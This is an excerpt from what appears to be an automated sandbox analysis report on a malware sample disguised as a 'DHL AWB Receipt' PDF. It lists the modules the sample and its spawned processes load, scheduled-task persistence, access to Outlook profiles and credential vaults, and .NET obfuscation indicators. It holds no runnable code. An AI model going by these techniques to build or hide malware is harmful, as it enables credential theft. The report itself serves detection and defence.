                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe	Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: version.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe	Section loaded: wininet.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe	Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe	Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe	Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe	Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe	Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder	Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: EhStorAuthn.pdbGCTL	source: RegSvcs.exe, 00000008.00000002.1997581227.0000000001267000.00000004.00000020.00020000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207467975.000000000147E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb,	source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2067458925.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2297221481.000000003D25C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.1998214366.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.000000000476E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2002079290.000000000441C000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.1996937638.0000000004266000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1998214366.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.000000000476E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2002079290.000000000441C000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.1996937638.0000000004266000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 00000008.00000002.1997581227.0000000001267000.00000004.00000020.00020000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207467975.000000000147E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: JifX.pdb source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr
                Source: Binary string: JifX.pdbSHA256c source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2067458925.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2297221481.000000003D25C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CLaoxM16clnn.exe, 00000012.00000000.1922490796.000000000064F000.00000002.00000001.01000000.0000000D.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2066595706.000000000064F000.00000002.00000001.01000000.0000000D.sdmp

                Data Obfuscation

                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.cs .Net Code: UM4qeegJM3 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.cs .Net Code: UM4qeegJM3 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.5650000.3.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 9.2.AYBPplggzXaXav.exe.2c7f220.0.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: DHL AWB Receipt_pdf.bat.exe Static PE information: 0x8104F5D4 [Thu Aug 5 01:52:20 2038 UTC]
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Code function: 0_2_060E0006 push es; ret 0_2_060E001C
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Code function: 0_2_0C0C1ACD push FFFFFF8Bh; iretd 0_2_0C0C1ACF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_004071FF push C35DE58Bh; ret 8_2_00407237
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00403260 push eax; ret 8_2_00403262
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00408395 push ss; ret 8_2_00408397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_004124E9 push eax; retf 8_2_004124EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0040B528 pushad ; retf 8_2_0040B52A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0040D53D push esi; retf 8_2_0040D53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_004146A6 push cs; iretd 8_2_004146BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F09AD push ecx; mov dword ptr [esp], ecx 8_2_016F09B6
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe Code function: 9_2_0B8912ED push FFFFFF8Bh; iretd 9_2_0B8912EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0193C54F push 8B018C67h; ret 17_2_0193C554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0193C54D pushfd ; ret 17_2_0193C54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_018F09AD push ecx; mov dword ptr [esp], ecx 17_2_018F09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0193C9D7 push edi; ret 17_2_0193C9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_018C1368 push eax; iretd 17_2_018C1369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_018C1FEC push eax; iretd 17_2_018C1FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_01947E99 push ecx; ret 17_2_01947EAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 17_2_0042E0DA push ds; iretd 17_2_0042E0E1
                Source: DHL AWB Receipt_pdf.bat.exe Static PE information: section name: .text entropy: 7.8130274669385855
                Source: AYBPplggzXaXav.exe.0.dr Static PE information: section name: .text entropy: 7.8130274669385855
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, bDa2M0oK9vE6Gf1vBc.cs High entropy of concatenated method names: 'j7pRhDudt6', 'yJxRplCO6Y', 'l7uRbZixUN', 'TZsRomYxO2', 'FmWRMu2jl5', 'Kq5RGf1mTe', 'fgPRmRyU7v', 'JRTRv6mG3X', 'A42RdPZboy', 'FOjRscFpo7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, si9JgEcumAg30dqAH6.cs High entropy of concatenated method names: 'MUcdCWVHOj', 'igUd4OH0sL', 'qq8dn10RF1', 'Fu6diSj9a0', 'bSmd7T0Kkm', 'csidjnptop', 'FtcdSuPx5r', 'SnNdFnbgKE', 'xNxdNGg9BS', 'BW5d9wTIQa'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, AFUpKa10wPAgLMUYOIX.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vb5sQeZWnU', 'yvfsAL9N5s', 'af8sgDyOl1', 'viMsWOZKC5', 'WhBstJDZfe', 'qflsZIbtpf', 'j7LskjJSiB'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, mV4FSHZvZDOIMsB1uh.cs High entropy of concatenated method names: 'ToString', 'PxSGQEVWYR', 'u4PG4PDCNQ', 'RtrGnNymwT', 'VsAGi3Tmfw', 'L8OG7byjvf', 'TNfGjMDcj4', 'b5FGSyDsZC', 'D6aGFUrQYE', 'k6OGN3nQVM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.cs High entropy of concatenated method names: 'AWyfl8jRBO', 'YaAfTKhhH7', 'SqvfYmapua', 'cbafRMZ8oJ', 'lyqfLaLYO1', 'BeUfPNbLlC', 'HIrfabF8v4', 'SnmfJg9BHk', 'dM2fE5ojtO', 'R9MfrW9iDg'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, tCMQJ6ia8jDxrqinL2.cs High entropy of concatenated method names: 'lIEPIq1s8u', 'zriPxrLxvp', 'hS2PefI5AT', 'TDFPh1M8yJ', 'RmxPpZjvjj', 'zuWPUj8ukH', 'gxnPoMOY6R', 'GkyPXpVdb1', 'UZG7WvDE3C60L6BoNUG', 'VOBIMaD5XhkDFrG2BYw'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, kFAbJl2c17i4sud8dO.cs High entropy of concatenated method names: 'oavdMWiunf', 'AE7dmM2YG6', 'PFmddDWCSS', 'Pl9d3qDhuU', 'e0kdwlU0qT', 'DmfdIj4MUQ', 'Dispose', 'DcsvTr9lG6', 'cuXvY4orHQ', 'njXvROIPrj'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, D68jwigE2t5mSN4rp0.cs High entropy of concatenated method names: 'LLcub2kbqv', 'IHvuoUr36t', 'oTduC8n0jW', 'sfxu4Y0FD6', 'FuwuintRKI', 'dYou7ysLHh', 'EjbuSTA5sh', 'FIOuFh6VjN', 'Pxju9E3kX0', 'jBvuQcEZcR'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, bRfj2rC4pG7ZEhNLJ9.cs High entropy of concatenated method names: 'j3IPlQ80i9', 'TB8PYi8NCp', 'QxvPLApyqU', 'o62PanQlOf', 'n47PJQtipL', 'c6fL8oYFL7', 'wBqL5KSLPt', 'rvTL252noD', 'eCQL6Hm1c5', 'EpyLcNeNhq'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, gl44wT1q87HLXYraSnC.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ywdBdguOkj', 'PQ5Bs4IaZm', 'COMB34L44i', 'FsYBBHNEhl', 'sowBwlRVkK', 'R4DBy8lm6F', 'SnABI1vHWw'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, zdj3PEYig9NLqPPXiq.cs High entropy of concatenated method names: 'Dispose', 'Ji41csud8d', 'nXqH4dreec', 'C6PoBUMBuk', 'A6d1VrH3I9', 'fOb1z8tZKi', 'ProcessDialogKey', 'b9sH0i9JgE', 'nmAH1g30dq', 'PH6HH3spSl'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, uspSlrVqFn8K2nCUsG.cs High entropy of concatenated method names: 'LiEsRu8vSa', 'e2rsLeU0op', 'L2BsPEJ22o', 'vjgsaFWkFF', 'SHBsdnRknQ', 'KYBsJ0r04x', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, KcKrm2qW9xBIeWQLXF.cs High entropy of concatenated method names: 'hGQ1aIIb5m', 'ms71JCURfU', 'aK91rvE6Gf', 'bvB1DcRMj6', 'zgU1Mt71Rf', 'K2r1G4pG7Z', 'e6BUsOLJkAU4AkRtkN', 'BrLeHQ3oyr4loovmrP', 'giQ1145QW4', 'o511f1xEeF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, z8nNWL11sc77dM38xRF.cs High entropy of concatenated method names: 'j95sVXFk5C', 'mLfsz8H9bF', 'VFf30KA3ts', 'QUs312UR04', 'gWB3H3RYUB', 'p393f3mvfO', 'rFi3qyqKul', 'Jbk3lguYrb', 'YpJ3TMIl8u', 'i5Y3YGc0nP'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, fc6Y4SNWFMIQhD6CIG.cs High entropy of concatenated method names: 'gafaxsodbv', 'f9faKJGUn8', 'iDEaekhWpg', 'qgNahhkD5s', 'MADaOdv8v1', 'p4RapSGh8a', 'JnFaUGUBoW', 'nPqaby0oaJ', 'QE6aosIxGc', 'j8KaXbCjCr'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, hMj6LOXuKTkJRKgUt7.cs High entropy of concatenated method names: 'ElELOCOKED', 'aT7LUW9Zp1', 'sVBRnUQ0Bd', 'FrKRif0aBc', 'iHOR7L8QZU', 'AQFRjHhUKo', 'fb7RSjd1s5', 'jkJRFIuSsa', 'z5kRNm7cDj', 'whnR9kPnR7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, K1ZpIWW5G9VChrxXwO.cs High entropy of concatenated method names: 'sd1M9ZycJJ', 'TLhMAtRwZf', 'Q7yMWV05cF', 'h8CMtMKCy9', 'E1kM4DSg2W', 'xDPMnuxVOU', 'iGjMisGjC9', 'WjrM7Pf6Jx', 'j8BMjYmMgs', 'GdnMSAmwVG'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, MFejuDHgOnDPHwdXdP.cs High entropy of concatenated method names: 'p8IelUJMc', 'bjrhQBnVa', 'q9mpccdRa', 'I6VULHnU6', 'uddopnRqB', 'yLjX1uQ9Y', 'ygECXPuhBuV91S83g7', 'RQqCuT1EgYyIe0XE9M', 'BcfvIRGvk', 'UOhsOjLNY'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, pQrWXt5IqWQySIbpSx.cs High entropy of concatenated method names: 'AHfm6l08YJ', 'kaAmVIgmcU', 'YVhv0mGEVe', 'dNgv1vBhFF', 'CevmQonXoa', 'wFWmAMATg9', 'VWqmglk3Ow', 'PuZmWRjH3C', 'T15mtEDtOV', 'KxsmZ11CO2'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, OIIb5mbrs7CURfU9gB.cs High entropy of concatenated method names: 'FCYYWD8v5Z', 'tx1YtKeWvv', 'mbsYZJ37sB', 'uHUYkKEKXu', 'lBpY8j7XxJ', 'H66Y5A5aT7', 'DIYY2pM0Oi', 'JYMY6hIQue', 'KM2YcFikmD', 'P7mYVNTmCe'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, HwPeY9jqZdqHXJllxe.cs High entropy of concatenated method names: 'u0IPZvc9b8', 'a1TPkac3an', 'HTZP8TFyQy', 'ToString', 'BnpP50Pd75', 'MHIP2Gkkx6', 'oXISovDfrdXiiTVG4S4', 'wcKthMDj7XOYgKce8mn', 'uyQRDODoKpMgVKfW9JZ'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, nGvw7VzhFHODOIwNM1.cs High entropy of concatenated method names: 'CddspwjxBw', 'Cnlsb63OPT', 'd05soQb1Wo', 'mGYsCkCXkv', 'qVxs4DNu9t', 'CoPsiI0ubO', 'dYbs7JIR4o', 'G7ksI0wccZ', 'nImsx6A06m', 'AGasKUYrZ5'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, bDa2M0oK9vE6Gf1vBc.cs High entropy of concatenated method names: 'j7pRhDudt6', 'yJxRplCO6Y', 'l7uRbZixUN', 'TZsRomYxO2', 'FmWRMu2jl5', 'Kq5RGf1mTe', 'fgPRmRyU7v', 'JRTRv6mG3X', 'A42RdPZboy', 'FOjRscFpo7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, si9JgEcumAg30dqAH6.cs High entropy of concatenated method names: 'MUcdCWVHOj', 'igUd4OH0sL', 'qq8dn10RF1', 'Fu6diSj9a0', 'bSmd7T0Kkm', 'csidjnptop', 'FtcdSuPx5r', 'SnNdFnbgKE', 'xNxdNGg9BS', 'BW5d9wTIQa'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, AFUpKa10wPAgLMUYOIX.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vb5sQeZWnU', 'yvfsAL9N5s', 'af8sgDyOl1', 'viMsWOZKC5', 'WhBstJDZfe', 'qflsZIbtpf', 'j7LskjJSiB'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, mV4FSHZvZDOIMsB1uh.cs High entropy of concatenated method names: 'ToString', 'PxSGQEVWYR', 'u4PG4PDCNQ', 'RtrGnNymwT', 'VsAGi3Tmfw', 'L8OG7byjvf', 'TNfGjMDcj4', 'b5FGSyDsZC', 'D6aGFUrQYE', 'k6OGN3nQVM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.cs High entropy of concatenated method names: 'AWyfl8jRBO', 'YaAfTKhhH7', 'SqvfYmapua', 'cbafRMZ8oJ', 'lyqfLaLYO1', 'BeUfPNbLlC', 'HIrfabF8v4', 'SnmfJg9BHk', 'dM2fE5ojtO', 'R9MfrW9iDg'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, tCMQJ6ia8jDxrqinL2.cs High entropy of concatenated method names: 'lIEPIq1s8u', 'zriPxrLxvp', 'hS2PefI5AT', 'TDFPh1M8yJ', 'RmxPpZjvjj', 'zuWPUj8ukH', 'gxnPoMOY6R', 'GkyPXpVdb1', 'UZG7WvDE3C60L6BoNUG', 'VOBIMaD5XhkDFrG2BYw'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, kFAbJl2c17i4sud8dO.cs High entropy of concatenated method names: 'oavdMWiunf', 'AE7dmM2YG6', 'PFmddDWCSS', 'Pl9d3qDhuU', 'e0kdwlU0qT', 'DmfdIj4MUQ', 'Dispose', 'DcsvTr9lG6', 'cuXvY4orHQ', 'njXvROIPrj'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, D68jwigE2t5mSN4rp0.cs High entropy of concatenated method names: 'LLcub2kbqv', 'IHvuoUr36t', 'oTduC8n0jW', 'sfxu4Y0FD6', 'FuwuintRKI', 'dYou7ysLHh', 'EjbuSTA5sh', 'FIOuFh6VjN', 'Pxju9E3kX0', 'jBvuQcEZcR'
